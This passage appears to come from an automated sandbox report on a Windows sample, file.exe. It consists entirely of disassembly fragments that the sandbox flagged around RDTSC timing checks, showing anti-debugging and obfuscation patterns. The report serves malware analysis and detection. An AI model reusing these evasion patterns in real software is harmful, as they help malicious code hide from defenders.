0x00000058 mov dword ptr [esp+04h], ebx 0x0000005c add dword ptr [esp+04h], 00000016h 0x00000064 inc ebx 0x00000065 push ebx 0x00000066 ret 0x00000067 pop ebx 0x00000068 ret 0x00000069 call 00007F84B0D65603h 0x0000006e xor dword ptr [ebp+12483D9Dh], edi 0x00000074 pop edi 0x00000075 push FFFFFFFFh 0x00000077 jns 00007F84B0D655FCh 0x0000007d add ebx, 4E59522Bh 0x00000083 push eax 0x00000084 push eax 0x00000085 push edx 0x00000086 push ecx 0x00000087 push ecx 0x00000088 pop ecx 0x00000089 pop ecx 0x0000008a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 253CFF second address: 253D0A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F84B0B050D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 253D0A second address: 253D9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a mov edi, dword ptr [ebp+122D280Ch] 0x00000010 add dword ptr [ebp+12462B5Fh], edx 0x00000016 push dword ptr fs:[00000000h] 0x0000001d call 00007F84B0D65605h 0x00000022 mov ebx, edx 0x00000024 pop ebx 0x00000025 mov dword ptr fs:[00000000h], esp 0x0000002c cmc 0x0000002d mov eax, dword ptr [ebp+122D027Dh] 0x00000033 push 00000000h 0x00000035 push edi 0x00000036 call 00007F84B0D655F8h 0x0000003b pop edi 0x0000003c mov dword ptr [esp+04h], edi 0x00000040 add dword ptr [esp+04h], 00000017h 0x00000048 inc edi 0x00000049 push edi 0x0000004a ret 0x0000004b pop edi 0x0000004c ret 0x0000004d add edi, dword ptr [ebp+122D2C8Ah] 0x00000053 push FFFFFFFFh 0x00000055 push 00000000h 0x00000057 push ebx 0x00000058 call 00007F84B0D655F8h 0x0000005d pop ebx 0x0000005e mov dword ptr [esp+04h], ebx 0x00000062 add dword ptr [esp+04h], 00000015h 0x0000006a inc ebx 0x0000006b push ebx 0x0000006c ret 0x0000006d pop ebx 0x0000006e ret 0x0000006f adc bx, 3CB7h 0x00000074 nop 0x00000075 push eax 0x00000076 push edx 0x00000077 pushad 0x00000078 push eax 0x00000079 push edx 0x0000007a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 253D9C second address: 253DB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F84B0B050E5h 0x00000009 popad 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 253DB6 second address: 253DBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 253DBC second address: 253DC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 253DC0 second address: 253DC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 255A8B second address: 255A8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 255A8F second address: 255A93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 255A93 second address: 255A99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 255C7B second address: 255C81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 255C81 second address: 255CE5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b js 00007F84B0B050DAh 0x00000011 mov bx, 4EA1h 0x00000015 push dword ptr fs:[00000000h] 0x0000001c push 00000000h 0x0000001e push edi 0x0000001f call 00007F84B0B050D8h 0x00000024 pop edi 0x00000025 mov dword ptr [esp+04h], edi 0x00000029 add dword ptr [esp+04h], 00000014h 0x00000031 inc edi 0x00000032 push edi 0x00000033 ret 0x00000034 pop edi 0x00000035 ret 0x00000036 or bl, FFFFFFD4h 0x00000039 mov dword ptr fs:[00000000h], esp 0x00000040 adc bx, B0B8h 0x00000045 mov eax, dword ptr [ebp+122D0AD1h] 0x0000004b mov dword ptr [ebp+122D1D36h], edx 0x00000051 push FFFFFFFFh 0x00000053 add edi, 2F20A0F0h 0x00000059 movzx edi, di 0x0000005c nop 0x0000005d pushad 0x0000005e push eax 0x0000005f push edx 0x00000060 push eax 0x00000061 push edx 0x00000062 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 255CE5 second address: 255CE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 255CE9 second address: 255D06 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F84B0B050D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a js 00007F84B0B050D8h 0x00000010 push edx 0x00000011 pop edx 0x00000012 popad 0x00000013 push eax 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 jp 00007F84B0B050D6h 0x0000001d rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 255D06 second address: 255D15 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F84B0D655F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push esi 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 25D967 second address: 25D99A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 js 00007F84B0B050D6h 0x0000000b jmp 00007F84B0B050E9h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F84B0B050DAh 0x00000018 push edx 0x00000019 pop edx 0x0000001a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 262211 second address: 262215 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 262215 second address: 262227 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b jo 00007F84B0B050D6h 0x00000011 pop eax 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 262227 second address: 26224D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F84B0D65602h 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f jnp 00007F84B0D65604h 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 26224D second address: 262251 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 262484 second address: 26248A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 26248A second address: 2624C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jne 00007F84B0B050E0h 0x00000014 mov eax, dword ptr [eax] 0x00000016 push ecx 0x00000017 jmp 00007F84B0B050E2h 0x0000001c pop ecx 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 push eax 0x00000022 push edx 0x00000023 push ecx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2624C7 second address: 2624CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2682A6 second address: 2682BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F84B0B050DEh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2675B4 second address: 2675F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007F84B0D65604h 0x0000000b popad 0x0000000c jp 00007F84B0D655F8h 0x00000012 popad 0x00000013 pushad 0x00000014 pushad 0x00000015 jmp 00007F84B0D655FAh 0x0000001a pushad 0x0000001b popad 0x0000001c popad 0x0000001d jg 00007F84B0D655F8h 0x00000023 push eax 0x00000024 pop eax 0x00000025 push eax 0x00000026 push edx 0x00000027 push esi 0x00000028 pop esi 0x00000029 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 267CA8 second address: 267CE8 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F84B0B050F7h 0x00000008 jns 00007F84B0B050DCh 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 jl 00007F84B0B050D6h 0x00000019 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 267CE8 second address: 267CEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 267CEC second address: 267D0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F84B0B050DCh 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jg 00007F84B0B050D6h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 267D0C second address: 267D10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 267D10 second address: 267D16 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 267E2C second address: 267E32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 267E32 second address: 267E36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 267FA8 second address: 267FC8 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F84B0D655FAh 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F84B0D65600h 0x00000015 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 26C4B4 second address: 26C4BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 26C4BD second address: 26C4C5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 26C4C5 second address: 26C4F5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 jp 00007F84B0B050D6h 0x0000000b pop ecx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 jmp 00007F84B0B050E6h 0x00000016 push esi 0x00000017 pop esi 0x00000018 pop edi 0x00000019 push eax 0x0000001a pushad 0x0000001b popad 0x0000001c push eax 0x0000001d pop eax 0x0000001e pop eax 0x0000001f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 26C4F5 second address: 26C4FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 26C4FB second address: 26C4FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1F0FBB second address: 1F0FC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 272122 second address: 272134 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnp 00007F84B0B050DEh 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 270C03 second address: 270C08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 270EA5 second address: 270EF2 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F84B0B050D6h 0x00000008 jmp 00007F84B0B050E2h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ebx 0x00000010 jmp 00007F84B0B050E8h 0x00000015 pop ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F84B0B050E5h 0x0000001d rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 270EF2 second address: 270F13 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F84B0D655F6h 0x00000008 jmp 00007F84B0D655FDh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 jnc 00007F84B0D655F6h 0x00000019 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 270F13 second address: 270F19 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 271240 second address: 27124A instructions: 0x00000000 rdtsc 0x00000002 jc 00007F84B0D655F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2714D7 second address: 2714E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jg 00007F84B0B050D8h 0x0000000b push eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2714E8 second address: 2714F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F84B0D655F6h 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2714F2 second address: 271511 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0B050E3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 27183D second address: 271842 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 271842 second address: 271848 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2719D3 second address: 2719F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F84B0D655FEh 0x0000000c pushad 0x0000000d popad 0x0000000e jno 00007F84B0D655F6h 0x00000014 push edx 0x00000015 jno 00007F84B0D655F6h 0x0000001b pop edx 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2719F6 second address: 271A0D instructions: 0x00000000 rdtsc 0x00000002 je 00007F84B0B050D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F84B0B050DDh 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 271A0D second address: 271A21 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0D655FEh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 271A21 second address: 271A36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F84B0B050E1h 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 271FA5 second address: 271FAA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2707D5 second address: 2707D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2707D9 second address: 2707E9 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F84B0D655F6h 0x00000008 je 00007F84B0D655F6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 20003F second address: 200048 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 200048 second address: 200051 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 200051 second address: 200066 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jne 00007F84B0B050DCh 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 200066 second address: 20006C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 20006C second address: 200082 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0B050E2h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 200082 second address: 20008B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 27A9EF second address: 27A9F9 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F84B0B050D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 27A9F9 second address: 27AA16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F84B0D65607h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 27AA16 second address: 27AA1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 27AA1A second address: 27AA35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F84B0D65601h 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1EF4A8 second address: 1EF4BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edi 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push edx 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1EF4BA second address: 1EF4DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F84B0D655F6h 0x0000000a popad 0x0000000b jng 00007F84B0D65607h 0x00000011 jmp 00007F84B0D65601h 0x00000016 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1EF4DC second address: 1EF4E1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 279D7A second address: 279D7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 279D7E second address: 279D92 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F84B0B050D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jnc 00007F84B0B050D6h 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 popad 0x00000014 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2794BB second address: 2794BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 27A295 second address: 27A2A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0B050E0h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 27A412 second address: 27A41A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 27A41A second address: 27A41E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 27E0CE second address: 27E102 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F84B0D65605h 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F84B0D65606h 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 242BA5 second address: 242BC3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F84B0B050E9h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 242BC3 second address: 242C17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007F84B0D655F8h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 00000015h 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 and ecx, 10BB7481h 0x0000002a lea eax, dword ptr [ebp+124978A5h] 0x00000030 sub cx, FAA5h 0x00000035 nop 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007F84B0D65609h 0x0000003d rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 242DF0 second address: 242E06 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jbe 00007F84B0B050DCh 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 24317F second address: 243183 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2432A9 second address: 2432AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2432AD second address: 2432DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop eax 0x00000008 jmp 00007F84B0D65609h 0x0000000d push C3929B54h 0x00000012 push eax 0x00000013 push edx 0x00000014 js 00007F84B0D655FCh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2432DD second address: 2432E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2432E1 second address: 2432EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F84B0D655F6h 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2433D0 second address: 2433D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 243500 second address: 243505 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 243505 second address: 24350B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
